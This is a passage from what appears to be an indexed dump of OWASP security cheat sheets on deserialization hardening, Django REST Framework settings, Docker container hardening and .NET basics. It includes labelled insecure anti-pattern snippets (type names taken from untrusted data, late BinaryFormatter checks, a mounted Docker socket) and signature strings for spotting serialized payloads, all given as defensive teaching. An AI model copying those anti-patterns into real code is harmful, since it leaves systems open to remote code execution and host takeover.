"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-all-javaioobjectinputstream-usage-with-an-agent","title":"Harden All java.io.ObjectInputStream Usage with an Agent","text":"

As mentioned above, the java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. However, if you don't own the code or can't wait for a patch, using an agent to weave in hardening to java.io.ObjectInputStream is the best solution.

Globally changing ObjectInputStream is only safe for block-listing known malicious types, because it's not possible to know for all applications what the expected classes to be deserialized are. Fortunately, there are very few classes needed in the blocklist to be safe from all the known attack vectors, today.

It's inevitable that more \"gadget\" classes will be discovered that can be abused. However, there is an incredible amount of vulnerable software exposed today, in need of a fix. In some cases, \"fixing\" the vulnerability may involve re-architecting messaging systems and breaking backwards compatibility as developers move towards not accepting serialized objects.

To enable these agents, simply add a new JVM parameter:

-javaagent:name-of-agent.jar\n

Agents taking this approach have been released by various community members:

A similar, but less scalable approach would be to manually patch and bootstrap your JVM's ObjectInputStream. Guidance on this approach is available here.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp","title":".Net CSharp","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_3","title":"WhiteBox Review","text":"

Search the source code for the following terms:

  1. TypeNameHandling
  2. JavaScriptTypeResolver

Look for any serializers where the type is set by a user controlled variable.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_2","title":"BlackBox Review","text":"

Search for the following base64 encoded content that starts with:

AAEAAAD/////\n

Search for content with the following text:

  1. TypeObject
  2. $type:
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#general-precautions","title":"General Precautions","text":"

Microsoft has stated that the BinaryFormatter type is dangerous and cannot be secured. As such, it should not be used. Full details are in the BinaryFormatter security guide.

Don't allow the datastream to define the type of object that the stream will be deserialized to. You can prevent this, for example, by using the DataContractSerializer or XmlSerializer if at all possible.

Where JSON.Net is being used, make sure that TypeNameHandling is only set to None.

TypeNameHandling = TypeNameHandling.None\n

If JavaScriptSerializer is to be used then do not use it with a JavaScriptTypeResolver.

If you must deserialise data streams that define their own type, then restrict the types that are allowed to be deserialized. One should be aware that this is still risky, as many native .Net types are potentially dangerous in themselves, e.g.

System.IO.FileInfo\n

FileInfo objects that reference files actually on the server can, when deserialized, change the properties of those files, e.g. to read-only, creating a potential denial of service attack.

Even if you have limited the types that can be deserialised, remember that some types have properties that are risky. System.ComponentModel.DataAnnotations.ValidationException, for example, has a property Value of type Object. If this type is allowed for deserialization, then an attacker can set the Value property to any object type they choose.

Attackers should be prevented from steering the type that will be instantiated. If this is possible then even DataContractSerializer or XmlSerializer can be subverted e.g.

// Action below is dangerous if the attacker can change the data in the database\nvar typename = GetTransactionTypeFromDatabase();\n\nvar serializer = new DataContractJsonSerializer(Type.GetType(typename));\n\nvar obj = serializer.ReadObject(ms);\n

Execution can occur within certain .Net types during deserialization. Creating a control such as the one shown below is ineffective.

var suspectObject = myBinaryFormatter.Deserialize(untrustedData);\n\n//Check below is too late! Execution may have already occurred.\nif (suspectObject is SomeDangerousObjectType)\n{\n//generate warnings and dispose of suspectObject\n}\n

For JSON.Net it is possible to create a safer form of allow-list control using a custom SerializationBinder.

Try to keep up-to-date on known .Net insecure deserialization gadgets and pay special attention where such types can be created by your deserialization processes. A deserializer can only instantiate types that it knows about.

Try to keep any code that might create potential gadgets separate from any code that has internet connectivity. As an example, System.Windows.Data.ObjectDataProvider used in WPF applications is a known gadget that allows arbitrary method invocation. It would be risky to have a reference to this assembly in a REST service project that deserializes untrusted data.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#known-net-rce-gadgets","title":"Known .NET RCE Gadgets","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#language-agnostic-methods-for-deserializing-safely","title":"Language-Agnostic Methods for Deserializing Safely","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#using-alternative-data-formats","title":"Using Alternative Data Formats","text":"

A great reduction of risk is achieved by avoiding native (de)serialization formats. By switching to a pure data format like JSON or XML, you lessen the chance of custom deserialization logic being repurposed towards malicious ends.

Many applications rely on a data-transfer object pattern that involves creating a separate domain of objects for the explicit purpose of data transfer. Of course, it's still possible that the application will make security mistakes after a pure data object is parsed.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#only-deserialize-signed-data","title":"Only Deserialize Signed Data","text":"

If the application knows before deserialization which messages will need to be processed, it could sign them as part of the serialization process. The application could then choose not to deserialize any message which didn't have an authenticated signature.
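
A minimal, language-agnostic illustration of this idea, written here as a Node.js sketch using an HMAC (the key handling and message format are assumptions for the example, not part of the cheat sheet):

const crypto = require('crypto');\n\nconst KEY = process.env.MESSAGE_SIGNING_KEY; // shared secret managed outside the code\n\n// Producer: serialize, then attach an HMAC computed over the serialized bytes.\nfunction signMessage(obj) {\nconst payload = JSON.stringify(obj);\nconst mac = crypto.createHmac('sha256', KEY).update(payload).digest('hex');\nreturn { payload: payload, mac: mac };\n}\n\n// Consumer: verify the HMAC before any deserialization takes place.\nfunction verifyAndDeserialize(message) {\nconst expected = crypto.createHmac('sha256', KEY).update(message.payload).digest('hex');\nif (typeof message.mac !== 'string' || message.mac.length !== expected.length ||\n!crypto.timingSafeEqual(Buffer.from(expected), Buffer.from(message.mac))) {\nthrow new Error('Invalid signature - refusing to deserialize');\n}\nreturn JSON.parse(message.payload);\n}\n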

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#mitigation-toolslibraries","title":"Mitigation Tools/Libraries","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#detection-tools","title":"Detection Tools","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html","title":"Django REST Framework (DRF) Cheat Sheet","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheat sheet intends to provide quick basic Django REST Framework security tips for developers.

The Django REST framework abstracts developers from quite a bit of tedious work and provides the means to build APIs quickly and with ease using Django. New developers, those unfamiliar with the inner workings of Django, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#settings","title":"Settings","text":"

All the Django REST Framework (DRF) configuration is done under the namespace REST_FRAMEWORK, usually in the settings.py file. From a security perspective, the most relevant ones are:

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_authentication_classes","title":"DEFAULT_AUTHENTICATION_CLASSES","text":"

A list of authentication classes that determines the default set of authenticators used when accessing the request.user or request.auth properties. In other words, what classes should be used to identify which user is authenticated.

Defaults are 'rest_framework.authentication.SessionAuthentication' and 'rest_framework.authentication.BasicAuthentication', which means that by default it checks the session and basic authentication for the user.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_permission_classes","title":"DEFAULT_PERMISSION_CLASSES","text":"

A list of permission classes that determines the default set of permissions checked at the start of a view.

Permission must be granted by every class in the list. Default is 'rest_framework.permissions.AllowAny', which means that by default every view allows access to everybody.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_throttle_classes","title":"DEFAULT_THROTTLE_CLASSES","text":"

A list of throttle classes that determines the default set of throttles checked at the start of a view. Default is empty, which means that by default there is no throttling in place.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_pagination_class","title":"DEFAULT_PAGINATION_CLASS","text":"

The default class to use for queryset pagination. Pagination is disabled by default. Lack of proper pagination could lead to Denial of Service (DoS) in cases where there\u2019s a lot of data.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#owasp-api-security-top-10","title":"OWASP API Security Top 10","text":"

The OWASP API Security Top 10 is a list of the most critical security risks for APIs, developed by the Open Web Application Security Project (OWASP). It is intended to help organizations identify and prioritize the most significant risks to their APIs, so that they can implement appropriate controls to mitigate those risks.

This section is based on that list. Your approach to securing your web API should be to start at the top threat (API1:2019 below) and work down; this will ensure that any time spent on security is spent most effectively, covering the top threats first and lesser threats afterwards. After covering the top 10, it is generally advisable to assess for other threats or get a professionally completed penetration test.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api12019-broken-object-level-authorization","title":"API1:2019 Broken Object Level Authorization","text":"

When using object-level permissions:

DO: Validate that the object can be accessed by the user using the method .check_object_permissions(request, obj). Example:

def get_object(self):\n    obj = get_object_or_404(self.get_queryset(), pk=self.kwargs[\"pk\"])\n    self.check_object_permissions(self.request, obj)\n    return obj\n

DO NOT: Override the method get_object() without checking if the request should have access to that object.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api22019-broken-user-authentication","title":"API2:2019 Broken User Authentication","text":"

DO: Use the setting value DEFAULT_AUTHENTICATION_CLASSES with the correct classes for your project.

DO: Have authentication on every non-public API endpoint.

DO NOT: Override the authentication classes on a class-based (variable authentication_classes) or function-based (decorator authentication_classes) view unless you are confident about the change and understand the impact.
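
For reference, a sketch of what such per-view overrides look like, so they can be spotted during review (the view names and TokenAuthentication are illustrative assumptions):

from rest_framework.authentication import TokenAuthentication\nfrom rest_framework.decorators import api_view, authentication_classes\nfrom rest_framework.views import APIView\n\nclass AccountView(APIView):\n    # Class-based override: replaces DEFAULT_AUTHENTICATION_CLASSES for this view only.\n    authentication_classes = [TokenAuthentication]\n\n@api_view([\"GET\"])\n@authentication_classes([TokenAuthentication])  # Function-based override.\ndef account_detail(request):\n    ...\n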

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api32019-excessive-data-exposure","title":"API3:2019 Excessive Data Exposure","text":"

DO: Review the serializer and the information you are displaying.

If the serializer inherits from ModelSerializer, DO NOT use the exclude Meta property.

DO NOT: Display more information than the minimum required.
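
A minimal serializer sketch using an explicit allow list of fields (the model and field names are assumptions for illustration):

from django.contrib.auth.models import User\nfrom rest_framework import serializers\n\nclass UserSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = User\n        # Allow-list only the fields that must be exposed.\n        fields = [\"id\", \"username\", \"email\"]\n        # Avoid exclude: newly added sensitive fields would be exposed by default.\n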

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api42019-lack-of-resources-rate-limiting","title":"API4:2019 Lack of Resources & Rate Limiting","text":"

DO: Configure the setting DEFAULT_THROTTLE_CLASSES.

DO NOT: Override the throttle classes on a class-based (variable throttle_classes) or function-based (decorator throttle_classes) view unless you are confident about the change and understand the impact.

EXTRA: If possible, rate limiting should also be done with a WAF or similar; DRF should be the last layer of rate limiting.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api52019-broken-function-level-authorization","title":"API5:2019 Broken Function Level Authorization","text":"

DO: Change the default value ('rest_framework.permissions.AllowAny') of DEFAULT_PERMISSION_CLASSES.

DO NOT: Use rest_framework.permissions.AllowAny except for public API endpoints.

DO: Use the setting value DEFAULT_PERMISSION_CLASSES with the correct classes for your project.

DO NOT: Override the permission classes on a class-based (variable permission_classes) or function-based (decorator permission_classes) view unless you are confident about the change and understand the impact.
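
For reference, a sketch of explicit per-view permission declarations (the view names are illustrative; AllowAny should be limited to genuinely public endpoints):

from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny, IsAdminUser\nfrom rest_framework.views import APIView\n\nclass AdminReportView(APIView):\n    # Stricter than the project default for an admin-only endpoint.\n    permission_classes = [IsAdminUser]\n\n@api_view([\"GET\"])\n@permission_classes([AllowAny])  # Acceptable only for genuinely public endpoints.\ndef health_check(request):\n    ...\n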

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api62019-mass-assignment","title":"API6:2019 Mass Assignment","text":"

When using ModelForms:

DO: Use Meta.fields (allow list approach).

DO NOT: Use Meta.exclude (block list approach).

DO NOT: Use ModelForms.Meta.fields = \"__all__\"
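
A minimal ModelForm sketch contrasting the approaches (the model and field names are assumptions for illustration):

from django import forms\nfrom django.contrib.auth.models import User\n\nclass UserProfileForm(forms.ModelForm):\n    class Meta:\n        model = User\n        fields = [\"first_name\", \"last_name\", \"email\"]  # allow list: safe\n        # exclude = [\"password\"]                        # block list: avoid\n        # fields = \"__all__\"                            # exposes every field: avoid\n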

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api72019-security-misconfiguration","title":"API7:2019 Security Misconfiguration","text":"

DO: Set the Django settings DEBUG and DEBUG_PROPAGATE_EXCEPTIONS to False.

DO: Set the Django setting SECRET_KEY to a random value. Never hardcode secrets (a minimal settings sketch follows below).

DO: Have a repeatable hardening process leading to fast and easy deployment of a properly locked down environment.

DO: Have an automated process to continuously assess the effectiveness of the configuration and settings in all environments.

DO: Ensure the API can only be accessed using the intended HTTP verbs. All other HTTP verbs should be disabled.

DO NOT: Use default passwords
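
A minimal settings.py sketch for the configuration points above (the environment variable name is an assumption; how the value is provisioned depends on your deployment):

import os\n\nDEBUG = False\nDEBUG_PROPAGATE_EXCEPTIONS = False\n# Never hardcode the secret; fail fast if it is not provided.\nSECRET_KEY = os.environ[\"DJANGO_SECRET_KEY\"]\n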

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api82019-injection","title":"API8:2019 Injection","text":"

DO: Validate, filter, and sanitize all client-provided data, or other data coming from integrated systems.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sqli","title":"SQLi","text":"

DO: Use parameterized queries.

TRY NOT TO: Use dangerous methods like raw(), extra() and custom SQL (via cursor.execute()).

DO NOT: Add user input to dangerous methods (raw(), extra(), cursor.execute()).
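
A minimal sketch of a parameterized raw query (the query itself is illustrative); the user-supplied value is passed as a parameter and never concatenated into the SQL string:

from django.db import connection\n\ndef find_user_id(username):\n    with connection.cursor() as cursor:\n        # The %s placeholder is filled in by the database driver, not by string formatting.\n        cursor.execute(\"SELECT id FROM auth_user WHERE username = %s\", [username])\n        row = cursor.fetchone()\n    return row[0] if row else None\n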

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#rce","title":"RCE","text":"

DO NOT: Add user input to dangerous methods (eval(), exec() and execfile()).

DO NOT: Load user-controlled pickle files. This includes the pandas method pandas.read_pickle().

DO NOT: Load user-controlled YAML files using the method load().

DO: Use Loader=yaml.SafeLoader when loading YAML files.
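
A minimal sketch of safe YAML parsing with PyYAML (the function name is illustrative):

import yaml\n\ndef parse_untrusted_yaml(text):\n    # SafeLoader only constructs plain Python types (dict, list, str, ...),\n    # so it cannot be abused to instantiate arbitrary objects.\n    return yaml.load(text, Loader=yaml.SafeLoader)\n    # Equivalent shorthand: yaml.safe_load(text)\n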

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api92019-improper-assets-management","title":"API9:2019 Improper Assets Management","text":"

DO: Have an inventory of all API hosts and document important aspects of each one of them, focusing on the API environment (e.g., production, staging, test, development), who should have network access to the host (e.g., public, internal, partners) and the API version.

DO: Document all aspects of your API such as authentication, errors, redirects, rate limiting, cross-origin resource sharing (CORS) policy and endpoints, including their parameters, requests, and responses.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api102019-insufficient-logging-monitoring","title":"API10:2019 Insufficient Logging & Monitoring","text":"

DO: Log all failed authentication attempts, denied access, and input validation errors with sufficient user context to identify suspicious or malicious accounts.

DO: Create logs in a format suited to be consumed by a log management solution, including enough detail to identify the malicious actor.

DO: Handle logs as sensitive data; their integrity should be guaranteed at rest and in transit.

DO: Configure a monitoring system to continuously monitor the infrastructure, network, and the API functioning.

DO: Use a Security Information and Event Management (SIEM) system to aggregate and manage logs from all components of the API stack and hosts.

DO: Configure custom dashboards and alerts, enabling suspicious activities to be detected and responded to earlier.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as Log.Error(\"Error was thrown\"); rather, log the stack trace, error message and the ID of the user who caused the error.

DO NOT: Log sensitive data such as users' passwords, API tokens or PII.
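
A minimal sketch of logging a failed authentication attempt with useful context but no secrets (the logger name and logged fields are illustrative assumptions):

import logging\n\nsecurity_logger = logging.getLogger(\"security\")\n\ndef log_failed_login(request, username):\n    # Enough context to identify suspicious accounts; never log passwords or tokens.\n    security_logger.warning(\n        \"Failed login username=%s ip=%s path=%s\",\n        username,\n        request.META.get(\"REMOTE_ADDR\"),\n        request.path,\n    )\n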

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#other-security-risks","title":"Other security Risks","text":"

Below is a list of security risks for APIs not discussed in the OWASP API Security Top 10.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult or impossible to detect using automated tools. The best ways to prevent business logic security bugs are threat modeling, security design reviews, code reviews, pair programming and writing unit tests.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#secret-management","title":"Secret Management","text":"

Secrets should never be hardcoded. The best practice is to use a Secret Manager. For more information, review the OWASP Secrets Management Cheat Sheet.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#updating-django-and-drf-and-having-a-process-for-updating-dependencies","title":"Updating Django and DRF and Having a Process for Updating Dependencies","text":"

A concern with every application, including Python applications, is that dependencies can have vulnerabilities.

One good practice is to audit the dependencies your project is using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update of a dependency:

The Django security team provides information on how Django discloses security issues.

Finally, an important aspect to consider before adding a new dependency to the project is the \"security health\" of the library: How often is it updated? Does it have known vulnerabilities? Does it have an active community? Some tools can help with this task (e.g. Snyk Advisor).

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sast-tools","title":"SAST Tools","text":"

There are several excellent open-source static analysis security tools for Python that are worth considering, including:

Bandit \u2013 Bandit is a tool designed to find common security issues in Python. To do this Bandit processes each file, builds an Abstract Syntax Tree (AST) from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report. Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Semgrep \u2013 Semgrep is a fast, open-source, static analysis engine for finding bugs, detecting vulnerabilities in third-party dependencies, and enforcing code standards. It is developed by \u201cReturn To Corporation\u201d (usually referred to as r2c) and open-source contributors. It works based on rules, which can focus on security, language best practices, or something else. Creating a rule is easy and Semgrep is very powerful. For Django, there are 29 rules.

PyCharm Security \u2013 Pycharm-security is a plugin for PyCharm, or JetBrains IDEs with the Python plugin. The plugin looks at Python code for common security vulnerabilities and suggests fixes. It can also be executed from a Docker container. It has about 40 checks and some are Django specific.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html","title":"Docker Security Cheat Sheet","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Docker is the most popular containerization technology. When used properly, it can increase the level of security (in comparison to running applications directly on the host). On the other hand, some misconfigurations can downgrade the level of security or even introduce new vulnerabilities.

The aim of this cheat sheet is to provide an easy-to-use list of common security mistakes and good practices that will help you secure your Docker containers.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rules","title":"Rules","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-0-keep-host-and-docker-up-to-date","title":"RULE #0 - Keep Host and Docker up to date","text":"

To prevent known container escape vulnerabilities, which typically end in escalation to root/administrator privileges, patching Docker Engine and Docker Machine is crucial.

In addition, containers (unlike virtual machines) share the kernel with the host, therefore kernel exploits executed inside a container will directly hit the host kernel. For example, a kernel privilege escalation exploit (like Dirty COW) executed inside a well-insulated container will still result in root access on the host.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-1-do-not-expose-the-docker-daemon-socket-even-to-the-containers","title":"RULE #1 - Do not expose the Docker daemon socket (even to the containers)","text":"

The Docker socket /var/run/docker.sock is the UNIX socket that Docker listens on. This is the primary entry point for the Docker API. The owner of this socket is root. Giving someone access to it is equivalent to giving unrestricted root access to your host.

Do not enable the TCP Docker daemon socket. If you are running the Docker daemon with -H tcp://0.0.0.0:XXX or similar, you are exposing unencrypted and unauthenticated direct access to the Docker daemon; if the host is connected to the internet, this means the Docker daemon on your computer can be used by anyone on the public internet. If you really, really have to do this, you should secure it; check how to do this in the official Docker documentation.

Do not expose /var/run/docker.sock to other containers. If you are running your Docker image with -v /var/run/docker.sock:/var/run/docker.sock or similar, you should change it. Remember that mounting the socket read-only is not a solution; it only makes it harder to exploit. The equivalent in a docker-compose file is something like this:

volumes:\n- \"/var/run/docker.sock:/var/run/docker.sock\"\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-2-set-a-user","title":"RULE #2 - Set a user","text":"

Configuring the container to use an unprivileged user is the best way to prevent privilege escalation attacks. This can be accomplished in three different ways as follows:

  1. During runtime using -u option of docker run command e.g.:

    docker run -u 4000 alpine\n
  2. During build time. Simply add a user in the Dockerfile and use it. For example:

    FROM alpine\nRUN groupadd -r myuser && useradd -r -g myuser myuser\n<HERE DO WHAT YOU HAVE TO DO AS A ROOT USER LIKE INSTALLING PACKAGES ETC.>\nUSER myuser\n
  3. Enable user namespace support (--userns-remap=default) in Docker daemon

More information about this topic can be found at Docker official documentation

In Kubernetes, this can be configured in the Security Context using the runAsNonRoot field, e.g.:

kind: ...\napiVersion: ...\nmetadata:\n  name: ...\nspec:\n  ...\n  containers:\n  - name: ...\n    image: ....\n    securityContext:\n      ...\n      runAsNonRoot: true\n  ...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-3-limit-capabilities-grant-only-specific-capabilities-needed-by-a-container","title":"RULE #3 - Limit capabilities (Grant only specific capabilities, needed by a container)","text":"

Linux kernel capabilities are a set of privileges that can be used by privileged processes. Docker, by default, runs with only a subset of capabilities. You can change this and drop some capabilities (using --cap-drop) to harden your Docker containers, or add some capabilities (using --cap-add) if needed. Remember not to run containers with the --privileged flag - this will add ALL Linux kernel capabilities to the container.

The most secure setup is to drop all capabilities --cap-drop all and then add only required ones. For example:

docker run --cap-drop all --cap-add CHOWN alpine\n

And remember: Do not run containers with the --privileged flag!!!

In Kubernetes, this can be configured in the Security Context using the capabilities field, e.g.:

kind: ...\napiVersion: ...\nmetadata:\n  name: ...\nspec:\n  ...\n  containers:\n  - name: ...\n    image: ....\n    securityContext:\n      ...\n      capabilities:\n        drop:\n        - all\n        add:\n        - CHOWN\n  ...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag","title":"RULE #4 - Add \u2013no-new-privileges flag","text":"

Always run your Docker images with --security-opt=no-new-privileges in order to prevent privilege escalation using setuid or setgid binaries.

In Kubernetes, this can be configured in the Security Context using the allowPrivilegeEscalation field, e.g.:

kind: ...\napiVersion: ...\nmetadata:\n  name: ...\nspec:\n  ...\n  containers:\n  - name: ...\n    image: ....\n    securityContext:\n      ...\n      allowPrivilegeEscalation: false\n  ...\n

As a Kubernetes cluster administrator, you can refer to Kubernetes documentation to configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-5-disable-inter-container-communication-iccfalse","title":"RULE #5 - Disable inter-container communication (--icc=false)","text":"

By default, inter-container communication (icc) is enabled, which means that all containers can talk to each other (using the docker0 bridged network). This can be disabled by running the Docker daemon with the --icc=false flag. If icc is disabled (icc=false), it is required to specify which containers can communicate using the --link=CONTAINER_NAME_or_ID:ALIAS option. See more in Docker documentation - container communication.

In Kubernetes, Network Policies can be used for this.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-6-use-linux-security-module-seccomp-apparmor-or-selinux","title":"RULE #6 - Use Linux Security Module (seccomp, AppArmor, or SELinux)","text":"

First of all, do not disable the default security profile!

Consider using a security profile like seccomp or AppArmor.

Instructions on how to do this inside Kubernetes can be found in the Security Context documentation and in the Kubernetes API documentation.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-7-limit-resources-memory-cpu-file-descriptors-processes-restarts","title":"RULE #7 - Limit resources (memory, CPU, file descriptors, processes, restarts)","text":"

The best way to avoid DoS attacks is by limiting resources. You can limit memory, CPU, maximum number of restarts (--restart=on-failure:<number_of_restarts>), maximum number of file descriptors (--ulimit nofile=<number>) and maximum number of processes (--ulimit nproc=<number>).

Check documentation for more details about ulimits

You can also do this inside Kubernetes: Assign Memory Resources to Containers and Pods, Assign CPU Resources to Containers and Pods and Assign Extended Resources to a Container

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-8-set-filesystem-and-volumes-to-read-only","title":"RULE #8 - Set filesystem and volumes to read-only","text":"

Run containers with a read-only filesystem using --read-only flag. For example:

docker run --read-only alpine sh -c 'echo \"whatever\" > /tmp'\n

If an application inside a container has to save something temporarily, combine --read-only flag with --tmpfs like this:

docker run --read-only --tmpfs /tmp alpine sh -c 'echo \"whatever\" > /tmp/file'\n

Equivalent in the docker-compose file will be:

version: \"3\"\nservices:\nalpine:\nimage: alpine\nread_only: true\n

The equivalent in the Kubernetes Security Context will be:

kind: ...\napiVersion: ...\nmetadata:\n  name: ...\nspec:\n  ...\n  containers:\n  - name: ...\n    image: ....\n    securityContext:\n      ...\n      readOnlyRootFilesystem: true\n  ...\n

In addition, if a volume is mounted only for reading, mount it as read-only. This can be done by appending :ro to the -v option like this:

docker run -v volume-name:/path/in/container:ro alpine\n

Or by using --mount option:

docker run --mount source=volume-name,destination=/path/in/container,readonly alpine\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-9-use-static-analysis-tools","title":"RULE #9 - Use static analysis tools","text":"

To detect containers with known vulnerabilities - scan images using static analysis tools.

To detect secrets in images:

To detect misconfigurations in Kubernetes:

To detect misconfigurations in Docker:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-10-set-the-logging-level-to-at-least-info","title":"RULE #10 - Set the logging level to at least INFO","text":"

By default, the Docker daemon is configured with a base logging level of 'info'; if this is not the case, set the Docker daemon log level to 'info'. Rationale: setting an appropriate log level configures the Docker daemon to log events that you would want to review later. A base log level of 'info' and above captures all logs except debug logs. Unless required, you should not run the Docker daemon at the 'debug' log level.

To configure the log level in docker-compose:

docker-compose --log-level info up\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-11-lint-the-dockerfile-at-build-time","title":"Rule #11 - Lint the Dockerfile at build time","text":"

Many issues can be prevented by following some best practices when writing the Dockerfile. Adding a security linter as a step in the build pipeline can go a long way in avoiding further headaches. Some issues that are worth checking are:

References:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-12-run-docker-in-root-less-mode","title":"Rule #12 - Run Docker in root-less mode","text":"

Rootless mode ensures that the Docker daemon and containers are running as an unprivileged user, which means that even if an attacker breaks out of the container, they will not have root privileges on the host, which in turn substantially limits the attack surface.

Rootless mode graduated from experimental in Docker Engine v20.10 and should be considered for added security, provided the known limitations are not an impediment.

Rootless mode allows running the Docker daemon and containers as a non-root user to mitigate potential vulnerabilities in the daemon and the container runtime. Rootless mode does not require root privileges even during the installation of the Docker daemon, as long as the prerequisites are met. Rootless mode was introduced in Docker Engine v19.03 as an experimental feature. Rootless mode graduated from experimental in Docker Engine v20.10.

Read more about rootless mode and its limitations, installation and usage instructions on Docker documentation page.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#related-projects","title":"Related Projects","text":"

OWASP Docker Top 10

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html","title":"DotNet Security Cheat Sheet","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page intends to provide quick basic .NET security tips for developers.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#the-net-framework","title":"The .NET Framework","text":"

The .NET Framework is Microsoft's principal platform for enterprise development. It is the supporting API for ASP.NET, Windows Desktop applications, Windows Communication Foundation services, SharePoint, Visual Studio Tools for Office and other technologies.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#updating-the-framework","title":"Updating the Framework","text":"

The .NET Framework is kept up-to-date by Microsoft with the Windows Update service. Developers do not normally need to run separate updates to the Framework. Windows Update can be accessed at Windows Update or from the Windows Update program on a Windows computer.

Individual frameworks can be kept up to date using NuGet. As Visual Studio prompts for updates, build it into your lifecycle.

Remember that third-party libraries have to be updated separately and not all of them use NuGet. ELMAH for instance, requires a separate update effort.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#security-announcements","title":"Security Announcements","text":"

Receive security notifications by selecting the \"Watch\" button at the following repositories:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#net-framework-guidance","title":".NET Framework Guidance","text":"

The .NET Framework is the set of APIs that support an advanced type system, data, graphics, network, file handling and most of the rest of what is needed to write enterprise apps in the Microsoft ecosystem. It is a nearly ubiquitous library that is strongly named and versioned at the assembly level.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#data-access","title":"Data Access","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data. It is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

The code is based on example from here: https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet

